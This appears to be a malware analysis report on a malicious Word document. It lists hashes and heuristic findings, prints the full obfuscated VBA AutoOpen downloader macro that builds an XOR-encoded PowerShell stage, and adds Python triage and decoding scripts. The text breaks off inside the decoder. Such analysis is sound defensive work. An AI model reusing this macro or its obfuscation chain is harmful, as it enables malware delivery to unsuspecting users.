Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4913394a07e07c41…

MALICIOUS

Office (OLE)

Size: 102.2 KB
Created: 2018-06-20 16:58:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: 1a1cf575cffc508cfe869ef1934ca852
SHA-1: 23c9f892fb9b17a2e191e379de3b50759e75e076
SHA-256: 4913394a07e07c41b313edccc2b85d88a3eaf53a0edad4f95c28f863f0c9e738
Risk score: 212

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment
T1204.002 Malicious File

The sample is a Word document whose VBA project is heavily obfuscated: every routine is padded with decoy CDate()/CByte()/Sin() arithmetic on randomly named variables, and the only work that matters is string concatenation. On AutoOpen the macro assembles a PowerShell command line from string fragments (the leading "P" comes from Chr(80), so the word "PowerShell" never appears intact in the source) and hands it to Shell() through an Application.Run indirection, with the window style written as 19592 - 19592, i.e. 0 (vbHide). The PowerShell stage derives "iex" from characters of $pshome and XOR-decodes (key 0x2f) a list of numbers into the real script, which downloads and executes a payload from a URL that is present only in encoded form inside the macro, never in plaintext. This is downloader/dropper behaviour, consistent with delivery as a spearphishing attachment.

Heuristics (8 findings)

  • ClamAV: Doc.Dropper.Agent-6585082-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6585082-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
    Matched line in script
    UdiiRq = CDate(21486)
    dZXHGZOTbli = JWfjWFJjn + Shell(qMudJiVWLsS + swdXCutRW + TEAvnTCCUSV, 19592 - 19592)
    uIJcU = CByte(TLTkr)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    End Function
    Sub AutoOpen()
    On Error Resume Next
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this generic description does not fit this sample: a full VBA project was recovered (macros.bas, below), so here the finding only restates the AutoOpen entry point already reported under OLE_VBA_AUTOOPEN.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the standard DrawingML XML namespace URI that Office writes into documents; it is benign and is not an indicator of compromise. The actual download location is XOR-encoded inside the macro strings and is not surfaced by this check.
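As an added illustration of how findings like the ones above (auto-exec entry point, Shell() sink, p-code execution tokens, random-looking identifiers) are produced, here is a small Python triage pass over raw VBA source. It is example code written for this page, not the report's scanner and not oletools. The input is a constructed excerpt of the macros.bas listing further down (its Shell() routine and the AutoOpen subroutine, with most decoy lines removed). The consonant-run rule used for "mangled" names is an assumption of this example, cheaper and cruder than whatever statistic the report's own 164-of-341 figure is based on.

```python
import re

# Constructed excerpt: the Shell() call site and the AutoOpen entry point,
# copied from the macros.bas listing on this page with most decoy lines removed.
SAMPLE_VBA = r'''
Function uPNmBYfmhC(swdXCutRW)
On Error Resume Next
UdiiRq = CDate(21486)
dZXHGZOTbli = JWfjWFJjn + Shell(qMudJiVWLsS + swdXCutRW + TEAvnTCCUSV, 19592 - 19592)
uIJcU = CByte(TLTkr)
End Function
Sub AutoOpen()
On Error Resume Next
ItaNOU = CByte(qiMzN)
IMkiRD = CDate(wvfsz + Sin(17869 + 4896) * 11696 * CInt(90663))
Application.Run zVPatQBiI + "uPNmBYfmhC" + jLNdQkwEa, RNDaibSphk + HRzmXFfCT + XqKdoPud
End Sub
'''

AUTOEXEC = {"autoopen", "auto_open", "autoexec", "autoclose",
            "document_open", "document_close", "workbook_open"}
SINKS = ("Shell", "Application.Run", "CreateObject", "WScript.Shell",
         "ShellExecute", "CallByName")
# VBA keywords/builtins seen in such macros; they must not count as mangled names
KEYWORDS = {"function", "sub", "end", "on", "error", "resume", "next", "cdate",
            "cbyte", "cint", "sin", "chr", "shell", "application", "run",
            "attribute", "dim", "set", "if", "then", "else", "call", "exit",
            "for", "to", "private", "public"}
PROC = re.compile(r"^\s*(?:(?:Private|Public)\s+)?(?:Sub|Function)\s+(\w+)", re.I)
SHELL_CALL = re.compile(r"\bShell\s*\((.*),\s*([^)]*)\)")
DECOY = re.compile(r"\b(?:CDate|CByte|CInt|Sin|Cos)\s*\(")
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")


def int_expr(text):
    """Fold the integer arithmetic used to hide constants: '19592 - 19592' -> 0.
    Returns None when the argument is not pure integer arithmetic."""
    if not re.fullmatch(r"[\d\s+\-]+", text.strip()):
        return None
    return sum(-int(n) if s == "-" else int(n)
               for s, n in re.findall(r"([+-]?)\s*(\d+)", text))


def looks_mangled(name):
    """Heuristic (assumption of this example): generated names tend to run four
    or more consonants together (bVYipwkDvDU); real words and CamelCase API
    names almost never do."""
    return len(name) >= 5 and re.search(r"[^aeiou]{4}", name.lower()) is not None


def triage(src):
    """Reproduce the report-style macro heuristics over raw VBA source."""
    lines = [l for l in src.splitlines() if l.strip()]
    r = {"autoexec": [], "sinks": [], "shell_window_style": None,
         "decoy_lines": 0, "identifiers": 0, "mangled": 0}
    seen = set()
    for n, line in enumerate(lines, 1):
        code = re.sub(r'"[^"]*"', '""', line)            # ignore string contents
        m = PROC.match(code)
        if m and m.group(1).lower() in AUTOEXEC:
            r["autoexec"].append(m.group(1))
        for sink in SINKS:
            if re.search(r"\b" + re.escape(sink) + r"\b", code):
                r["sinks"].append((n, sink))
        m = SHELL_CALL.search(code)
        if m:
            r["shell_window_style"] = int_expr(m.group(2))   # 0 = vbHide
        if DECOY.search(code):
            r["decoy_lines"] += 1
        for name in IDENT.findall(code):
            if name.lower() not in KEYWORDS:
                seen.add(name)
    r["identifiers"] = len(seen)
    r["mangled"] = sum(looks_mangled(n) for n in seen)
    return r
```

triage(SAMPLE_VBA) reports the AutoOpen entry point, the Shell() and Application.Run sinks with their line numbers, a folded window style of 0 (hidden window), four decoy lines out of twelve, and 12 of 19 distinct identifiers flagged as mangled. The same pass over the full listing is what turns "lots of CDate() calls" into a number an analyst can threshold on.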

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11484 bytes
SHA-256: 501cdf5c7c991ccd04b633a56757deec924f9d2d91f13470cd088b6e90cce831
Detection: ClamAV: No threats found
Obfuscation or payload: likely. 164 of 341 identifiers look randomly generated (e.g. 'bVYipwkDvDU'); 3 string-concatenation chain(s), consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script (the module is shorter than that, so the listing below is the complete decoded source)
Attribute VB_Name = "IFXRNqtz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "LbwcJFwT"
Function EDaTqlzhW()
On Error Resume Next
lzSDjT = CDate(dklACN + Sin(21671 + 51402) * 79117 * CInt(93264))
jkGKN = KSfOLj
kuiEC = 9589
Hirrw = CByte(qrXnu)
hiOTZ = 79677
NCDrw = CDate(42789)
EaiJk = "Ower" + "SHell &( $" + "pSHom" + "e[21" + "]+$psHOmE[30]+" + "'x')( " + Chr(34) + "$(SEt-iTEM " + " '" + "VaRIAbLe:OF" + "s'  "
zrAzQ = CDate(IWjEH + Sin(29613 + 48149) * 72560 * CInt(59865))
wZWRwh = oImwkv
KYOaGG = 43186
jAnNHj = CByte(lhalj)
CXDQh = 17164
OnTRDi = CDate(36691)
NbjVt = "'')" + Chr(34) + " " + "+[STRING]( '11" + "@97," + "122w95w64s" + "123L85@1" + "5L18e15A65A7"
IDWpl = CDate(pJjjWK + Sin(84016 + 35851) * 38305 * CInt(54364))
pYKBt = KZWLc
NqjHPA = 42815
RTcIsS = CByte(MBXRwM)
ocUtFL = 47120
iEXbYB = CDate(69809)
abwwNVowQYR = "4M" + "88,2A64" + "L77,6" + "9@74e76L91M15"
QmGvq = CDate(IdnKCf + Sin(64870 + 44148) * 45162 * CInt(642))
oQuqUv = kanSXJ
DhvXrq = 70821
CzLkvY = CByte(dZKOnM)
wjamM = 9322
OXNas = CDate(8968)
luiYSALFAW = "e9" + "3w78G65L" + "75@64G66L" + "20s11@105k1" + "06" + "L96A69M67@76s1" + "5,18@15," + "65k74"
zHkKv = CDate(jrUqh + Sin(91473 + 69786) * 53849 * CInt(91526))
bAofVV = pVvip
FYZAmz = 24329
isrXV = CByte(cKLwrJ)
kvIGI = 18445
QLpFd = CDate(86813)
brwzkplvHz = "G88L2A64A" + "77e69e74s76" + "G91k15" + "e12" + "4@86,9" + "2G91L7" + "4e66" + "s1s97@"
svpAZt = CDate(58757)
uYpbSY = CDate(vZXdkj + Sin(87061 + 52093) * 48675 * CInt(41342))
HjbRC = 71434
VOvZiU = CByte(NEoNi)
GFapG = 95927
UvWqUt = jdMqbs
litMEjsVp = "74M91@1w12" + "0e74G77@108G6" + "7,70,74M" + "65A91G20" + "M11M92w120@"
muaFw = CDate(58732)
iaSlS = CDate(iZSEL + Sin(5209 + 18238) * 55583 * CInt(67434))
vdRfR = 68586
zzTQii = CByte(iNDEw)
MhnOT = 43036
sawOjX = WlKwiA
iGkUbcP = "106L90k78" + "@15" + "s18,15A8M71A91," + "91L95s21L0k0w" + "75w64s67,90k" + "64,65s72w71G7" + "0s74e90G94A" + "90" + "@7"
HaAYPr = CDate(57153)
uJMzJ = CDate(oPkHhd + Sin(68581 + 46356) * 46861 * CInt(52339))
izHzzQ = 18014
BmYDQh = CByte(BQlGjv)
RPmrO = 81450
VhfWdN = ljpjwb
ERbhoW = "8A1,76w64,66M0" + "e122A12" + "5@103w75" + "k122A1" + "24k127e123@85A2" + "2s0A111L71G" + "91k"
EDaTqlzhW = EaiJk + NbjVt + abwwNVowQYR + luiYSALFAW + brwzkplvHz + litMEjsVp + iGkUbcP + ERbhoW
End Function
Function iwTjjPcLoSw()
On Error Resume Next
LamIQ = CDate(17565)
QOzjJ = CDate(QzfSVc + Sin(28970 + 70851) * 37046 * CInt(36441))
XCNAB = 96752
RQjCZ = CByte(uJwsRw)
PEksrl = 5914
dZmGH = taSQH
LcCiA = "91e95w21w0" + "@0s9" + "2," + "86A65A74w93L7" + "2L86@76L" + "78G95e70k"
GqUJA = CDate(30150)
lkXzQ = CDate(CkkOJ + Sin(56258 + 71856) * 43465 * CInt(70433))
DtoXz = 58497
WpjpsI = CByte(irWAIz)
UOwOR = 71473
bOojas = qcFOz
wLFZibk = "91" + "A78@67M1k69L9" + "5@0s" + "95k103A101" + "G126,103,127s2" + "5@0A111k" + "71w9"
sOhWLm = CDate(10271)
QAMOTl = CDate(clmhEj + Sin(73306 + 26909) * 97132 * CInt(95491))
JpcHi = 88061
HrfMh = CByte(EtuLj)
YLqHf = 32371
jbzaUl = isqbTR
ZLsTkwr = "1w91" + "M95w" + "21e0,0e88M88@8" + "8G1k66L74@64" + "A71" + "A78A86A7" + "7@64e91"
psoARV = CDate(22475)
UvGSjz = CDate(kVSNHG + Sin(43994 + 72852) * 81784 * CInt(85924))
wqcHHi = 53391
GAiYS = CByte(dkpfa)
mSvmKt = 31197
wQvaAc = kDDCb
KRlIaBGzfF = "e90w70k1M7" + "6M64e66w0,94G1" + "02e91" + "G69" + "k104k102@0k1"
wwhiu = CDate(54839)
oKkbwc = CDate(jvCLd + Sin(18823 + 72631) * 20120 * CInt(71064))
SUsPXS = 37205
SHzIW = CByte(vkuvi)
VuriP = 65425
ESTQXK = PPCvWm
bVYipwkDvDU = "11k7" + "1M91L91M" + "95L21e0M0@70" + "s95k71s64L65s74" + "G92A1s77s70" + "s7" + "5e0e10"
hZHJI = CDate(84566)
iSHvCQ = CDate(nAaXc + Sin(16763 + 94315) * 89875 * CInt(51329))
BfTqzi = 67823
UblLl = CByte(bIKRzs)
jqqtj = 4813
LBjul = MPpTTF
srDrrR = "1M72,105" + "e124L" + "92" + "s89@75,28k" + "0s111@71" + "w91A91@95k2" + "1k0s0" + "w8" + "8G" + "88L"
fNwjho = CDate(87782)
lPNsGS = CDate(jFGdz + Sin(36721 + 85158) * 10752 * CInt(9328))
qIVao = 16371
tXjOmz = CByte(zHLvzk)
TqMmU = 2279
GNjjiw = RaLuYq
ZzzcVlrqz = "88e1M64M66e" + "90G9" + "3L66k78k68w70L" + "65@78" + ",1G65e74G91s0k" + "106M31L126G87G" + "70@24,70A12" + "1M107k12" + "4e0e8w1s124"
GIHPzJ = CDate(13424)
GkDnN = CDate(oHZJRd + Sin(98384 + 47428) * 74637 * CInt(64345))
tfubFp = 38658
bmHrCa = CByte(KwGQba)
qKjUjX = 76591
jrfOfD = TNYlT
zMUCKYj = ",95e" + "67w70k91" + "w7w8w" + "111L8e6M"
TAIDni = CDate(36273)
zirPt = CDate(UzJXw + Sin(92643 + 29661) * 43727 * CInt(63433))
MuVqh = 14989
wjiVZ = CByte(SRbsaj)
CwoCz = 3890
PuPXsF = GqJvMl
MzqOHbN = "20A11w70G95" + "G127,106,69M11" + "0@15s18s15@11A9" + "7A" + "122M9"
iwTjjPcLoSw = LcCiA + wLFZibk + ZLsTkwr + KRlIaBGzfF + bVYipwkDvDU + srDrrR + ZzzcVlrqz + zMUCKYj + MzqOHbN
End Function
Function CGQnwhqVO()
On Error Resume Next
kiHLr = CDate(41139)
HMXiAJ = CDate(OZYoI + Sin(57829 + 10740) * 89675 * CInt(96208))
GjBwUR = 38926
kOzTSn = CByte(SvOrCl)
IZwcdC = 49726
TiIjto = AEjwW
qPuufjp = "5s" + "64w123" + "A85s1w65w74e87" + "s91w7A30"
vcSriP = CDate(27203)
BcsYF = CDate(AddYw + Sin(7401 + 11982) * 94669 * CInt(24727))
SifDVp = 7352
HTpjNr = CByte(MSNYP)
NLmZp = 69981
qcRNm = QdKJW
wTIkAm = "A3G15L27e" + "31L23G27A" + "26" + "L27s6k20k11L117" + "s71w" + "88s101M69s" + "15s18M15" + "@11"
rMONw = CDate(59430)
PRlZOV = CDate(VJiUbA + Sin(6378 + 39492) * 52075 * CInt(7567))
rwIIp = 24589
poZLYz = CByte(LBFwB)
LOTYD = 1230
kYmCKh = oNPfiu
cVCFzKO = "A74w65A89@21L" + "91M74M66" + "w95A15@" + "4,15M8k1"
ZIbpbn = CDate(15144)
lkwXD = CDate(hRrAq + Sin(92344 + 5790) * 76299 * CInt(87922))
CHuBTl = 45630
TWlKP = CByte(GLNHE)
FafdHP = 68531
uXfAEC = QzCXu
KQLBvVkwUc = "15s8w" + "15G" + "4k15" + "M11k70G95" + "s127w1" + "06G69s110" + "A1" + "5w4A15e8@" + "1,"
YBdnmm = CDate(49752)
SvYKS = CDate(PQWQis + Sin(398 + 83381) * 13317 * CInt(73053))
NHOioU = 25901
IvlOi = CByte(EIHLii)
hnFpz = 26097
wKWWWw = FupGlq
JwUTpwqjHpn = "74e87w74e8L20w" + "73,64G93G74e7" + "8G76" + "A71M7@11,118" + "@75L94" + "k64w124k15M" + "70s65G15," + "11G92e120e" + "10"
rEXrIf = CDate(61128)
AEuBH = CDate(bjwhi + Sin(73192 + 3583) * 62197 * CInt(36093))
QNork = 89469
mfjur = CByte(pcDow)
sWfMEf = 98501
IMtjM = jQtAV
JujRwdsirk = "6w" + "90w78A6,84k" + "91G9" + "3G86" + "e84@11k105" + "k106A96" + "A69A6" + "7@76G1G107k64e"
CGQnwhqVO = qPuufjp + wTIkAm + cVCFzKO + KQLBvVkwUc + JwUTpwqjHpn + JujRwdsirk
End Function
Function MPPpmBY()
On Error Resume Next
UiIGCb = CDate(76167)
BShVhk = CDate(dZbDCZ + Sin(25675 + 13667) * 67414 * CInt(7078))
kinSjJ = 60962
JKzLm = CByte(iwlwC)
QEWFUq = 55095
Njnja = dDNGW
fqYqV = "88A65w67,64e" + "78," + "75L105k70M67A74" + "w7@11G118" + "@75e94" + "k6" + "4A124L1e123L64"
dXYHsL = CDate(96808)
UsQGcf = CDate(GiMPP + Sin(57249 + 64741) * 11254 * CInt(68307))
iBdEXK = 86469
VHWZCs = CByte(DnSsZ)
zuTBOG = 36857
iXrSRC = DiAdFz
YRwjaCkL = "L1" + "24G91w93" + "e70A65w72M7A" + "6G3,15w11,117"
DtiiA = CDate(71238)
QUKjqc = CDate(EKpUMw + Sin(41422 + 87482) * 38476 * CInt(9689))
MBzFF = 55672
OvRoL = CByte(nHOCp)
SzUYMp = 7788
QmQLn = wZpQj
bGjBc = "A71e88A10" + "1w69A6M20M124e9" + "1s78A93G" + "91M2M1" + "27@93A6" + "4L76,74e" + "92M92L15A11" + "k117M71e88@1" + "01s69w20L77k9" + "3,74M"
hRnNY = CDate(56214)
XsYIE = CDate(pkEEH + Sin(67743 + 41516) * 21521 * CInt(16017))
aMhJc = 34184
qswJZZ = CByte(jzREh)
YUlzv = 42112
tGGHwN = GIHwi
UoPjbwCOtsG = "78A68A20k82@7" + "6s78s91A76G71e" + "84@88M93s70,91s" + "74,2L71L" + "64L92,91G15G1" + "1L112s1@" + "106M87M76A7" + "4@95L9"
MPPpmBY = fqYqV + YRwjaCkL + bGjBc + UoPjbwCOtsG
End Function
Function nfQMAQ()
On Error Resume Next
zwRHb = CDate(61497)
WjapKM = CDate(BwXKh + Sin(50879 + 94333) * 76740 * CInt(92483))
UnFJkl = 60294
JULuZl = CByte(GRVaKX)
dKzKnl = 71919
IXiNT = ULaCnI
qcIVR = "1," + "70s64,65k" + "1M98L74e92G92" + "k78@7" + "2A74w20" + "L82e82'.sPLIt" + "( ',@AMGekwsL'" + " ) |fOreA" + "CH{ [cha"
FijJR = CDate(85823)
uziPJ = CDate(Kwtwp + Sin(16350 + 96728) * 61128 * CInt(8268))
OZoFV = 96549
cwULA = CByte(wEBWC)
fPWMQE = 31891
ihbIdi = zolff
vJvLinIlVk = "R]($_ -Bx" + "Or '0x2f') })" + " +" + Chr(34) + "$( " + "sEt-ITeM  '"
kbXXiW = CDate(27625)
Svhbnn = CDate(WSSNZz + Sin(71280 + 51575) * 63226 * CInt(10316))
jLJpQE = 11670
NEZBv = CByte(bqkbP)
qXuRWw = 26214
faojcp = WJFnlK
SpnQvqXALw = "VARIABlE:Ofs'" + "  ' ' ) " + Chr(34) + ")"
nfQMAQ = qcIVR + vJvLinIlVk + SpnQvqXALw
End Function

Function DPvzRwKX()
On Error Resume Next
dQWqJt = CByte(RIrjK)
UlmNzR = CDate(wiKjwU + Sin(89652 + 1800) * 23415 * CInt(35009))
CdIwd = 20777
pMVIJf = 70185
hrLBO = IajfS
SWLcIR = CDate(79386)
PYVzK = CByte(jwcTX)
UaLlV = CDate(oqFQrb + Sin(64227 + 31090) * 88613 * CInt(20793))
LcaTZj = 99709
vZnWMf = 76601
KTUjd = fqHOZ
EXhBf = CDate(6845)
lrqFKM = CByte(qMilq)
rDFVk = CDate(GZKww + Sin(36766 + 98336) * 81069 * CInt(89489))
mzXWQ = 58234
KGNUph = 73908
RIObai = napkYr
fvONP = CDate(4847)
SrNlwz = CByte(AbjJb)
sFiANM = CDate(mKViCM + Sin(5990 + 16151) * 95694 * CInt(44441))
VEFwj = 30247
GdsMN = 23876
vnFFml = FUaaiX
uvVih = CDate(49010)
POmzw = CByte(mlhmTs)
viLvk = CDate(PKmmO + Sin(62289 + 62968) * 46128 * CInt(79780))
kBSqG = 9769
sfFOI = 80581
ndjcc = wFtUr
HrVMc = CDate(95177)
End Function
Function HRzmXFfCT()
On Error Resume Next
zuXmLz = CByte(lhjsU)
GjAXq = CDate(ICzQv + Sin(93893 + 1612) * 41426 * CInt(3899))
hDqMo = 61317
pzUjJs = 25702
HJtzHz = VnDlu
amFBPT = CDate(97927)
zwMcw = UEVKYojKKD + Chr(pWNPFVU + 80 + UsbnzOTkQB)
zXlEk = CByte(uGZAK)
ITbPr = CDate(oKsoIn + Sin(46115 + 24393) * 8293 * CInt(47765))
OUlKj = 70835
hLwicz = 42289
RjKZu = ufwjDs
JiknZ = CDate(25689)
NmwFF = CByte(WtCiN)
wrtjE = CDate(HWEOM + Sin(85303 + 46812) * 56624 * CInt(36190))
ubvNC = 35056
ChKvo = 21302
mzmKK = tAPWp
jjstlS = CDate(26480)
HRzmXFfCT = JGZzCAJ + zwMcw + EDaTqlzhW + iwTjjPcLoSw + CGQnwhqVO + MPPpmBY + nfQMAQ
onSVEC = CByte(jHnfD)
XEQEN = CDate(wSZzj + Sin(95659 + 21279) * 58185 * CInt(11646))
WtMAD = 24262
rSpdf = 32936
tSnHVa = QkOqY
iztUiN = CDate(68270)
End Function
Function uPNmBYfmhC(swdXCutRW)
On Error Resume Next
wFlArL = CByte(Pacwwh)
tUfNWf = CDate(btmHsj + Sin(38703 + 60130) * 56603 * CInt(80993))
CRrtUO = 65036
wzLClF = 74959
oQCPAj = BBwsb
TwSYR = CDate(65143)
BjnVc = CByte(dRbdTz)
URuXDN = CDate(SOiLp + Sin(31775 + 1320) * 41365 * CInt(19991))
jwojp = 83124
FPwjL = 62669
wFTik = RGuzC
UdiiRq = CDate(21486)
dZXHGZOTbli = JWfjWFJjn + Shell(qMudJiVWLsS + swdXCutRW + TEAvnTCCUSV, 19592 - 19592)
uIJcU = CByte(TLTkr)
zITMJ = CDate(UGQaZ + Sin(55010 + 97862) * 68499 * CInt(43356))
tzZdU = 98347
fQPOB = 10042
IwSfuA = wOoBwV
ksdRI = CDate(26080)
End Function
Sub AutoOpen()
On Error Resume Next
ItaNOU = CByte(qiMzN)
IMkiRD = CDate(wvfsz + Sin(17869 + 4896) * 11696 * CInt(90663))
wAWABD = 71437
cQCqk = 90811
iHvKah = ErDwf
wVDXk = CDate(609)
Application.Run zVPatQBiI + "uPNmBYfmhC" + jLNdQkwEa, RNDaibSphk + HRzmXFfCT + XqKdoPud
TzEVr = CByte(cpdEji)
cuSRK = CDate(jlwnmi + Sin(58853 + 66294) * 8424 * CInt(74196))
swLIY = 90630
vHSzr = 10092
GFqmnw = CPZOW
idazNQ = CDate(54298)
End Sub
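The macro's string assembly can be replayed statically rather than in a sandbox. The Python below is an added example written for this page, not tooling from the report: it walks the assignment lines of the listing above (every string literal in MACRO_EXCERPT is copied verbatim from it; the decoy CDate()/CByte()/Sin() lines and the Function/End Function wrappers are omitted because they contribute nothing), treats names that were never assigned as VBA Empty (which concatenates as "" and counts as 0 inside Chr()), folds Chr(), and then emulates the PowerShell Split / -bxor stage to recover the inner script. That `$pSHome[21]+$psHOmE[30]+'x'` evaluates to "iex" relies on the default PowerShell install path (C:\Windows\System32\WindowsPowerShell\v1.0), a fact about Windows rather than something the page states. The decoded output is whatever the page's own literals encode; nothing in it is supplied by this example.

```python
import re

# Assignment lines copied verbatim from the macros.bas listing above: the five
# chunk-building functions, then the assembler HRzmXFfCT. Decoy lines and the
# Function/End Function wrappers are omitted; the evaluator treats every line
# as a global assignment, so the flat form is equivalent.
MACRO_EXCERPT = r'''
EaiJk = "Ower" + "SHell &( $" + "pSHom" + "e[21" + "]+$psHOmE[30]+" + "'x')( " + Chr(34) + "$(SEt-iTEM " + " '" + "VaRIAbLe:OF" + "s'  "
NbjVt = "'')" + Chr(34) + " " + "+[STRING]( '11" + "@97," + "122w95w64s" + "123L85@1" + "5L18e15A65A7"
abwwNVowQYR = "4M" + "88,2A64" + "L77,6" + "9@74e76L91M15"
luiYSALFAW = "e9" + "3w78G65L" + "75@64G66L" + "20s11@105k1" + "06" + "L96A69M67@76s1" + "5,18@15," + "65k74"
brwzkplvHz = "G88L2A64A" + "77e69e74s76" + "G91k15" + "e12" + "4@86,9" + "2G91L7" + "4e66" + "s1s97@"
litMEjsVp = "74M91@1w12" + "0e74G77@108G6" + "7,70,74M" + "65A91G20" + "M11M92w120@"
iGkUbcP = "106L90k78" + "@15" + "s18,15A8M71A91," + "91L95s21L0k0w" + "75w64s67,90k" + "64,65s72w71G7" + "0s74e90G94A" + "90" + "@7"
ERbhoW = "8A1,76w64,66M0" + "e122A12" + "5@103w75" + "k122A1" + "24k127e123@85A2" + "2s0A111L71G" + "91k"
EDaTqlzhW = EaiJk + NbjVt + abwwNVowQYR + luiYSALFAW + brwzkplvHz + litMEjsVp + iGkUbcP + ERbhoW
LcCiA = "91e95w21w0" + "@0s9" + "2," + "86A65A74w93L7" + "2L86@76L" + "78G95e70k"
wLFZibk = "91" + "A78@67M1k69L9" + "5@0s" + "95k103A101" + "G126,103,127s2" + "5@0A111k" + "71w9"
ZLsTkwr = "1w91" + "M95w" + "21e0,0e88M88@8" + "8G1k66L74@64" + "A71" + "A78A86A7" + "7@64e91"
KRlIaBGzfF = "e90w70k1M7" + "6M64e66w0,94G1" + "02e91" + "G69" + "k104k102@0k1"
bVYipwkDvDU = "11k7" + "1M91L91M" + "95L21e0M0@70" + "s95k71s64L65s74" + "G92A1s77s70" + "s7" + "5e0e10"
srDrrR = "1M72,105" + "e124L" + "92" + "s89@75,28k" + "0s111@71" + "w91A91@95k2" + "1k0s0" + "w8" + "8G" + "88L"
ZzzcVlrqz = "88e1M64M66e" + "90G9" + "3L66k78k68w70L" + "65@78" + ",1G65e74G91s0k" + "106M31L126G87G" + "70@24,70A12" + "1M107k12" + "4e0e8w1s124"
zMUCKYj = ",95e" + "67w70k91" + "w7w8w" + "111L8e6M"
MzqOHbN = "20A11w70G95" + "G127,106,69M11" + "0@15s18s15@11A9" + "7A" + "122M9"
iwTjjPcLoSw = LcCiA + wLFZibk + ZLsTkwr + KRlIaBGzfF + bVYipwkDvDU + srDrrR + ZzzcVlrqz + zMUCKYj + MzqOHbN
qPuufjp = "5s" + "64w123" + "A85s1w65w74e87" + "s91w7A30"
wTIkAm = "A3G15L27e" + "31L23G27A" + "26" + "L27s6k20k11L117" + "s71w" + "88s101M69s" + "15s18M15" + "@11"
cVCFzKO = "A74w65A89@21L" + "91M74M66" + "w95A15@" + "4,15M8k1"
KQLBvVkwUc = "15s8w" + "15G" + "4k15" + "M11k70G95" + "s127w1" + "06G69s110" + "A1" + "5w4A15e8@" + "1,"
JwUTpwqjHpn = "74e87w74e8L20w" + "73,64G93G74e7" + "8G76" + "A71M7@11,118" + "@75L94" + "k64w124k15M" + "70s65G15," + "11G92e120e" + "10"
JujRwdsirk = "6w" + "90w78A6,84k" + "91G9" + "3G86" + "e84@11k105" + "k106A96" + "A69A6" + "7@76G1G107k64e"
CGQnwhqVO = qPuufjp + wTIkAm + cVCFzKO + KQLBvVkwUc + JwUTpwqjHpn + JujRwdsirk
fqYqV = "88A65w67,64e" + "78," + "75L105k70M67A74" + "w7@11G118" + "@75e94" + "k6" + "4A124L1e123L64"
YRwjaCkL = "L1" + "24G91w93" + "e70A65w72M7A" + "6G3,15w11,117"
bGjBc = "A71e88A10" + "1w69A6M20M124e9" + "1s78A93G" + "91M2M1" + "27@93A6" + "4L76,74e" + "92M92L15A11" + "k117M71e88@1" + "01s69w20L77k9" + "3,74M"
UoPjbwCOtsG = "78A68A20k82@7" + "6s78s91A76G71e" + "84@88M93s70,91s" + "74,2L71L" + "64L92,91G15G1" + "1L112s1@" + "106M87M76A7" + "4@95L9"
MPPpmBY = fqYqV + YRwjaCkL + bGjBc + UoPjbwCOtsG
qcIVR = "1," + "70s64,65k" + "1M98L74e92G92" + "k78@7" + "2A74w20" + "L82e82'.sPLIt" + "( ',@AMGekwsL'" + " ) |fOreA" + "CH{ [cha"
vJvLinIlVk = "R]($_ -Bx" + "Or '0x2f') })" + " +" + Chr(34) + "$( " + "sEt-ITeM  '"
SpnQvqXALw = "VARIABlE:Ofs'" + "  ' ' ) " + Chr(34) + ")"
nfQMAQ = qcIVR + vJvLinIlVk + SpnQvqXALw
zwMcw = UEVKYojKKD + Chr(pWNPFVU + 80 + UsbnzOTkQB)
HRzmXFfCT = JGZzCAJ + zwMcw + EDaTqlzhW + iwTjjPcLoSw + CGQnwhqVO + MPPpmBY + nfQMAQ
'''

TOKEN = re.compile(r'"((?:[^"]|"")*)"|Chr\(([^()]*)\)|([A-Za-z_]\w*)')
ASSIGN = re.compile(r"^\s*([A-Za-z_]\w*)\s*=\s*(.*?)\s*$")
PAYLOAD = re.compile(r"\[STRING\]\(\s*'([^']*)'\.split\(\s*'([^']*)'\s*\)", re.I)
XORKEY = re.compile(r"-bxor\s*'?(0x[0-9a-f]+|\d+)'?", re.I)


def eval_expr(expr, env):
    """Evaluate one VBA concatenation chain. Never-assigned names are Empty:
    "" when concatenated, 0 inside Chr(); that is how the junk names vanish."""
    out = []
    for m in TOKEN.finditer(expr):
        if m.group(1) is not None:                      # "literal" ("" = one quote)
            out.append(m.group(1).replace('""', '"'))
        elif m.group(2) is not None:                    # Chr(a + 80 + b) -> Chr(80)
            out.append(chr(sum(int(n) for n in re.findall(r"\d+", m.group(2)))))
        else:                                           # bare identifier
            out.append(env.get(m.group(3), ""))
    return "".join(out)


def run_macro(src):
    """Replay every assignment in order in one flat namespace. A decoy line
    such as x = CDate(12345) evaluates to "" and never affects the result."""
    env = {}
    for line in src.splitlines():
        m = ASSIGN.match(line)
        if m:
            env[m.group(1)] = eval_expr(m.group(2), env)
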